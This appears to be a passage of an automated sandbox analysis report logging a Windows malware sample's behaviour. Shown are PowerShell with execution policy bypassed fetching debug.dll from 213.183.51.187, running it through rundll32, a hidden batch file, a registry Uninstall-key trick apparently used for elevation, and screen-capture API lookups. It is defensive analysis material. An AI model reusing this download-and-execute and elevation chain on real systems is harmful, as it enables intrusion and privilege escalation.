| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, data = 4160, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | "C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll HOK | os_pid = 0xae4, show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | ||
| Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
2 | ||
| Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | ||
| Map | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = F71GWAT |
|
1 | |
| Get Info | type = Operating System |
|
6 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
10 | |
| Create | mutex_name = Global\.net clr networking |
|
1 | |
| Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
10 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
126 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\BGC6u8Oy yXGxkR |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\BGC6u8Oy yXGxkR |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
3 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Set Environment String | name = PSExecutionPolicyPreference, value = Bypass |
|
1 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
| Information | Value |
|---|---|
| Total Data Sent | 0.07 KB (73 bytes) |
| Total Data Received | 519.24 KB (531698 bytes) |
| Contacted Host Count | 1 |
| Contacted Hosts | 213.183.51.187:80 |
| Information | Value |
|---|---|
| Handle | 0x4f0 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 213.183.51.187 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 1728 |
| Data Sent | 0.07 KB (73 bytes) |
| Data Received | 519.24 KB (531698 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 213.183.51.187, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 73, size_out = 73 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4096, size_out = 4096 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1712 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8516 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 7260 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 49368 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8712 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3752 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 6412 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 7064 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 5808 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 21780 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 5808 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 12872 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 46188 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 13068 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 52618, size_out = 17228 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 35390, size_out = 5808 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 29582, size_out = 4356 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 25226, size_out = 25226 |
|
1 |
| Information | Value |
|---|---|
| Total Data Sent | 0.07 KB (73 bytes) |
| Total Data Received | 519.24 KB (531698 bytes) |
| Contacted Host Count | 1 |
| Contacted Hosts | 213.183.51.187 |
| Information | Value |
|---|---|
| Server Name | 213.183.51.187 |
| Server Port | 80 |
| Data Sent | 0.07 KB (73 bytes) |
| Data Received | 519.24 KB (531698 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = 213.183.51.187, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /debug.dll |
|
1 | |
| Send HTTP Request | headers = host: 213.183.51.187, connection: Keep-Alive, url = 213.183.51.187/debug.dll |
|
1 | |
| Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Read Response | size = 65536, size_out = 1712 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 8516 |
|
1 | |
| Read Response | size = 65536, size_out = 7260 |
|
1 | |
| Read Response | size = 65536, size_out = 49368 |
|
1 | |
| Read Response | size = 65536, size_out = 8712 |
|
1 | |
| Read Response | size = 65536, size_out = 3752 |
|
1 | |
| Read Response | size = 65536, size_out = 6412 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 7064 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 5808 |
|
1 | |
| Read Response | size = 65536, size_out = 21780 |
|
1 | |
| Read Response | size = 65536, size_out = 5808 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 12872 |
|
1 | |
| Read Response | size = 65536, size_out = 46188 |
|
1 | |
| Read Response | size = 65536, size_out = 13068 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 52618, size_out = 17228 |
|
1 | |
| Read Response | size = 35390, size_out = 5808 |
|
1 | |
| Read Response | size = 29582, size_out = 4356 |
|
1 | |
| Read Response | size = 25226, size_out = 25226 |
|
1 |
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\rundll32.exe |
| Command Line | "C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll HOK |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:44, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:31 |
| Information | Value |
|---|---|
| PID | 0xae4 |
| Parent PID | 0xa50 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AE8
0x
AF4
0x
AF8
0x
AFC
0x
B00
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\bgc6u8~1\appdata\local\temp\iun4816.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\bgc6u8~1\appdata\local\temp\iun4816.bat | 0.24 KB (245 bytes) |
MD5:
9cc8f01a19e5c00ef42c554b2aef38fd
SHA1: ac464faa791113edc96cc061835dcf5b698d5b01 SHA256: f7a647b095d8948d42f34958dc73fc9ca569399d81251336a59a1a3dcb6fe908 |
|
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Temp File | C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.tmp | path = C:\Users\BGC6U8~1\AppData\Local\Temp\, prefix = iun |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE |
|
1 | ||
| Open | STD_OUTPUT_HANDLE |
|
1 | ||
| Open | STD_ERROR_HANDLE |
|
1 | ||
| Write | C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat | size = 245 |
|
1 | |
| Delete | C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.tmp |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\CutBat |
|
1 | ||
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\CutBat | value_name = szDisplayName, data = CutBat, size = 6, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\CutBat | value_name = UninstallString, data = C:\Windows\system32\rundll32.exe C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll SSSS, size = 83, type = REG_SZ |
|
1 | |
| Delete Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\CutBat |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat | show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | api-ms-win-core-synch-l1-2-0 | base_address = 0x0 |
|
4 | |
| Load | kernel32 | base_address = 0x0 |
|
2 | |
| Load | kernel32 | base_address = 0x76590000 |
|
2 | |
| Load | api-ms-win-core-fibers-l1-1-1 | base_address = 0x0 |
|
4 | |
| Load | api-ms-win-core-localization-l1-2-1 | base_address = 0x0 |
|
2 | |
| Load | Shlwapi | base_address = 0x76b40000 |
|
1 | |
| Load | Shell32 | base_address = 0x758a0000 |
|
1 | |
| Load | Advapi32 | base_address = 0x764f0000 |
|
1 | |
| Load | psapi.dll | base_address = 0x773f0000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x764f0000 |
|
1 | |
| Load | user32.dll | base_address = 0x76890000 |
|
1 | |
| Load | shell32.dll | base_address = 0x758a0000 |
|
1 | |
| Load | wininet.dll | base_address = 0x77040000 |
|
1 | |
| Load | ws2_32.dll | base_address = 0x76960000 |
|
1 | |
| Load | version.dll | base_address = 0x74940000 |
|
1 | |
| Load | gdi32.dll | base_address = 0x76840000 |
|
1 | |
| Load | ole32.dll | base_address = 0x77140000 |
|
1 | |
| Get Filename | api-ms-win-core-localization-l1-2-1 | process_name = c:\windows\system32\rundll32.exe, file_name_orig = C:\Windows\system32\rundll32.exe, size = 260 |
|
1 | |
| Get Filename | process_name = c:\windows\system32\rundll32.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll, size = 260 |
|
1 | ||
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x765e3879 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x765e418d |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x765e76e6 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x765e1e16 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7661f72b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x765e395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibrary, address_out = 0x765dd9d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x765dcf41 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x765dcee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x765d96fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x765dca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x765d0273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualAlloc, address_out = 0x765e2fb6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapAlloc, address_out = 0x772f2dd6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GlobalReAlloc, address_out = 0x765cec90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualFree, address_out = 0x765e1da4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualProtect, address_out = 0x765d2341 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapFree, address_out = 0x765dbbd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcessHeap, address_out = 0x765e1280 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsBadReadPtr, address_out = 0x765cb6a3 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetNativeSystemInfo, address_out = 0x765cbe77 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = OutputDebugStringA, address_out = 0x765ceb36 |
|
1 | |
| Get Address | c:\windows\system32\gdi32.dll | function = CreateDCA, address_out = 0x7684cca9 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = IsRectEmpty, address_out = 0x768a561e |
|
1 | |
| Get Address | c:\windows\system32\gdi32.dll | function = CreateCompatibleDC, address_out = 0x76846888 |
|
1 | |
| Get Address | c:\windows\system32\gdi32.dll | function = GetDeviceCaps, address_out = 0x76846f7f |
|
1 | |
| Get Address | c:\windows\system32\gdi32.dll | function = CreateCompatibleBitmap, address_out = 0x768473ad |
|
1 | |
| Get Address | c:\windows\system32\gdi32.dll | function = SelectObject, address_out = 0x76846640 |
|
1 | |
| Get Address | c:\windows\system32\gdi32.dll | function = BitBlt, address_out = 0x768472c0 |
|
1 | |
| Get Address | c:\windows\system32\gdi32.dll | function = DeleteDC, address_out = 0x76846eaa |
|
1 | |
| Get Address | c:\windows\system32\gdi32.dll | function = GetObjectA, address_out = 0x7684914f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GlobalAlloc, address_out = 0x765d9ce1 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GlobalLock, address_out = 0x765d9e05 |
|
1 | |
| Get Address | c:\windows\system32\gdi32.dll | function = GetStockObject, address_out = 0x76845ddf |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetDC, address_out = 0x768a544c |
|
1 | |
| Get Address | c:\windows\system32\gdi32.dll | function = SelectPalette, address_out = 0x7684a1f6 |
|
1 | |
| Get Address | c:\windows\system32\gdi32.dll | function = RealizePalette, address_out = 0x7684ef91 |
|
1 | |
| Get Address | c:\windows\system32\gdi32.dll | function = GetDIBits, address_out = 0x7684a23b |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = ReleaseDC, address_out = 0x768a5421 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x765e1400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GlobalUnlock, address_out = 0x765d9d50 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GlobalFree, address_out = 0x765d9cf9 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyA, address_out = 0x764fcd01 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegSetValueExA, address_out = 0x765014b3 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7650469d |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteKeyA, address_out = 0x7651a8b7 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoInitialize, address_out = 0x7715b636 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CLSIDFromString, address_out = 0x7715e599 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoGetObject, address_out = 0x7719b68d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x765e452b |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoUninitialize, address_out = 0x771886d3 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x765e1f61 |
|
2 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String |
|
1 |
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\system32\dllhost.exe |
| Command Line | C:\Windows\system32\DllHost.exe /Processid:{FCC74B77-EC3E-4DD8-A80B-008A702075A9} |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:47, Reason: RPC Server |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:28 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0xb54 |
| Parent PID | 0x258 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B70
0x
B6C
0x
B68
0x
B64
0x
B60
0x
B5C
0x
B58
|
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\windows\system32\rundll32.exe |
| Command Line | "C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll SSSS |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:47, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:28 |
| Information | Value |
|---|---|
| PID | 0xb74 |
| Parent PID | 0xb54 (c:\windows\system32\dllhost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B78
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
